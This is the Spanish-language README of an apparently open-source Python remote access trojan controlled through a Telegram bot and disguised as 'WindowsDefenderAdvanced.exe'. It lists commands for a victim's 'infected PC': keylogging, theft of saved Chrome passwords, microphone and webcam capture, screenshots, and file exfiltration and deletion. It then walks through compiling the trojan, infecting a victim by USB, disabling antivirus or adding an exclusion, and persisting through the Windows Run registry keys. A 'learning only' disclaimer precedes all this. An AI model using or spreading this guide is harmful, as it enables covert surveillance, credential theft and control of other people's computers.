╔═══╦═══╦════╗ ╔════╗ ╔╗ ╔╗╔╗╔╗ ╔╗
║╔═╗║╔═╗║╔╗╔╗║ ║╔╗╔╗║ ║║ ║║║║║║ ║║
║╚═╝║║ ║╠╝║║╚╝╔╗╔╦╦══╗╚╝║║╠╩═╣║╔══╦══╦═╦══╦╗╔╗ ║║║║║╠╦═╗╔═╝╠══╦╗╔╗╔╦══╗
║╔╗╔╣╚═╝║ ║║ ║╚╝╠╣╔╗║ ║║║║═╣║║║═╣╔╗║╔╣╔╗║╚╝║ ║╚╝╚╝╠╣╔╗╣╔╗║╔╗║╚╝╚╝║══╣
║║║╚╣╔═╗║ ║║ ╚╗╔╣║╔╗║ ║║║║═╣╚╣║═╣╚╝║║║╔╗║║║║ ╚╗╔╗╔╣║║║║╚╝║╚╝╠╗╔╗╔╬══║
╚╝╚═╩╝ ╚╝ ╚╝ ╚╝╚╩╝╚╝ ╚╝╚══╩═╩══╩═╗╠╝╚╝╚╩╩╩╝ ╚╝╚╝╚╩╝╚╩══╩══╝╚╝╚╝╚══╝
╔═╝║
╚══╝ v 1.1.0
Nota: Éste proyecto tiene como finalidad el aprendizaje de ciberseguridad y hacking, no me hago responsable de un posible mal uso de ésta herramienta.
Read this documentation in English
- Fecha de documentación :
09/05/2020 - Versión: v
1.1.0 - Peso compilado:
45MBaproximadamente - Versión Python:
3.7(Obligatoriamente debe ser ésta versión) - Licencia:
MIT licence
Doc= Contiene la documentación en inglesCompilar.bat= Convierte el archivo*.pya*.exeEjecutar.bat= Ejecuta el RAT en consola, se muestra una consola.iconDefender.ico= Icono Windows DefenderLICENCE= Licenciaproxy.py= librería*.py, no mover ni modificarREADME.md= Ésta DocumentaciónStartUp.reg= [Modifica el Registro de Windows] <== En la versión 1.1.0 se eliminó éste archivo ya que ahora este archivo viene incluido dentro del códigoversionN.txt= Información detalla de conversión*.pya*.exeWindowsDefenderAdvanced.py= Código fuente del RAT via Telegram Windows
Nota: Si usted desea puede descargar el entorno virtual de python 3.7 con todas las librerías instaladas y usadas en éste proyecto aquí
Librerías utilizadas
- import
winshell - import
tendo - import
winreg<== Permite modificar el registro de Windows - import
pypiwin32 - import
pyinstaller<= Compila el proyecto - import
psutil - import
pillow - import
opencv-python - import
sys - import
threading<= Permite ejecución multihilos - import
datetime - import
argparse - import
logging - import
socket<== Verifica conexión a internet - import
select
Apaga la computadora de la [PC Infectada]
Graba desde el microfono de la [PC Infectada]
Ejemplo:
/audio [Tiempo en segundos]
/audio 45
Toma una captura de pantalla - [PC Infectada]
Navega entre carpetas - [PC Infectada]
Ejemplo:
/ir [Ruta entre comillas dobles y debe terminar con un "\"]
/ir "D:\SoftwarePortable\Android Studio\"
Muestra la lista de archivos que se encuentran en una carpeta - [PC Infectada]
Ejemplo:
/listar [Ruta entre comillas dobles y debe terminar con un "\"]
/listar "D:\SoftwarePortable\Android Studio\plugins\"
Muestra la información desde la DNS - [PC Infectada]
Copia un archivo de una carpeta a otra - [PC Infectada]
Ejemplo:
/copiar [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/copiar "C:\Users\Anonymous\Documents\virus.exe" "C:\Users\Anonymous\Desktop\virus.exe"
Descarga un archivo - [PC Infectada]
Ejemplo:
/descargar [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/descargar "O:\OneDrive - xKx\Pictures\Developer Software\Website\logo.png"
Ejecuta un EXE - [PC Infectada]
Ejemplo:
/ejecutar [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/ejecutar "C:\Users\Public\virus.exe"
Elimina un archivo o carpeta - [PC Infectada]
Ejemplo:
/eliminar [Ruta entre comillas dobles y debe terminar con un "\" o con la extensión del archivo]
/eliminar "D:\Photos\FotosFamilia\"
/eliminar "D:\Photos\FotosFamilia\03122019.jpg"
Envía archivos de nuestra PC o celular a la [PC Infectada]
Ejemplo:
/enviar [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/enviar "C:\Users\Anonymous\Documents\virus.exe" "C:\Users\Victima\Documents\NoEsvirus.exe"
Cambia fondo de pantalla - [PC Infectada]
Ejemplo:
/fondo C:/Users/User/Desktop/porn.jpg
Obtiene las contraseñas guardadas en Chrome - [PC Infectada]
Obtiene el registro de teclas - [PC Infectada]
Obtiene la información desde la IP [PC Infectada]
Mueve archivos - [PC Infectada]
Ejemplo:
/mover [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/mover "C:\Users\Anonymous\Documents\virus.exe" "C:\Users\Anonymous\Desktop\virus.exe"
Abre un puerto localhost:8081 - [PC Infectada]
No recomentable ya que, windows mandará un mensaje de FireWall, por ahora no se recomienda.
Muestra información de la red- [PC Infectada]
Reinicia la computadora - [PC Infectada]
Muestra información de procesos - [PC Infectada]
Verifica si la [PC Infectada] se encuentra en linea
Muestra la ruta donde se encuentra el RAT
Abre un URL en el navegador predeterminado de
Ejemplo:
/web https://www.youtube.com/watch?v=ywGOLN0dDKU
/web https://www.xxx.com
Graba o toma foto de la webcam
NOTA: No probado, tampoco sé si la luz de la webCam se enciende.
Se está trabajando en las siguientes caracteristicas y se iran habilitando en las siguientes actualizaciones
Nota: Si usted desea puede descargar el entorno virtual de python 3.7 con todas las librerías instaladas y usadas en éste proyecto aquí
-
Editar el archivo
WindowsDefenderAdvanced.py -
Creamos en BotFather un Bot
-
Obtenemos nuetro token
-
Entramos y agregamos nuestro token del bot
-
lo que sigue despues es obtener el ID de nuestro chat, pero para eso necesitamos ua ejecutar nuestro RAT.
-
Para ejecutarlo, busque el archivo
Ejecutar.bat=> Y le damos a editar. -
He insertamos la ruta donde se encuentra nuestro RAT
-
Una vez terminado ya podemos ejecutar nuestro RAT y en la consola se verá algo así.
-
Y en nuestro telegram tenemos que mandar un comando, para recibir nuestro ID del chat
-
Y en nuestra consola aparecerá nuestro ID del chat
-
Ahora con el ID único que obtuvimos, tenemos que escribirlo dentro del archivo
WindowsDefenderAdvanced.py -
Y listo, ahora nuestro RAT solo responderá a nuestro ID privado, nadie más podrá tener ese acceso. ya está listo para compilar.
-
Busque el archivo
Compilar.bat -
=> Clic derecho => Editar
Y colocamos la ruta de la carpeta donde se encuentra el RAT
-
=> Guardamos => Ejecutamos para compilar...
-
Listo, el RAT se compiló exitosamente.
¿Cómo infecto a la victima?
-
El archivo compilado es el siguiente
Nota: No cambiar de nombre al archivo WindowsDefenderAdvanced.exe, si usted le cambia el nombre, el RAT quedará obsoleto.
- Usten guardará el archivo en un USB.
- Conectará el USB a la [PC] a infectar.
- Se recomienda desactivar el antivirus o agregar una exclusión en al siguiente ruta:
"C:\Users\Public\Security\Windows Defender". - Lo siguiente es ejecutar el archivo
WindowsDefenderAdvanced.exeen el USB, el RAT se replicará en la siguiente ruta"C:\Users\Public\Security\Windows Defender", Se recomienda no sacar el USB al instante ya que elRATse estará replicando en la ruta.
NOTA: Al ejecutar el archivó, ésta automaticamente modificará el registro de windows para que se inicie siempre al prender la computadora.
El RAT tratará de modificar la siguiente ruta del registro "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" por lo cual necesitará permisos de administrador, por ende se recomienda que la primera ejecución se realice con permisos de administrador, en caso de que no lo ejecute con permisos de administrador, el RAT modificará la siguiente ruta "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
Explicación:
HKEY_LOCAL_MACHINE:El RAT se ejecutará en todos los usuarios exitentes y los nuevos usuarios de la computadoraHKEY_CURRENT_USER:El RAT solo se ejecutará en el usuario actual, si se llegará a crear otro usuario, el RAT Solo funcionará en el usuario principal
- Repositorio Original: mvrozanti <== Es el creador original de éste repositorio.
- Repostitorio: Keylogger_Python <== Éste repositorio fue integrado en un 50% dentro de RAT_via_Telegram_Windows.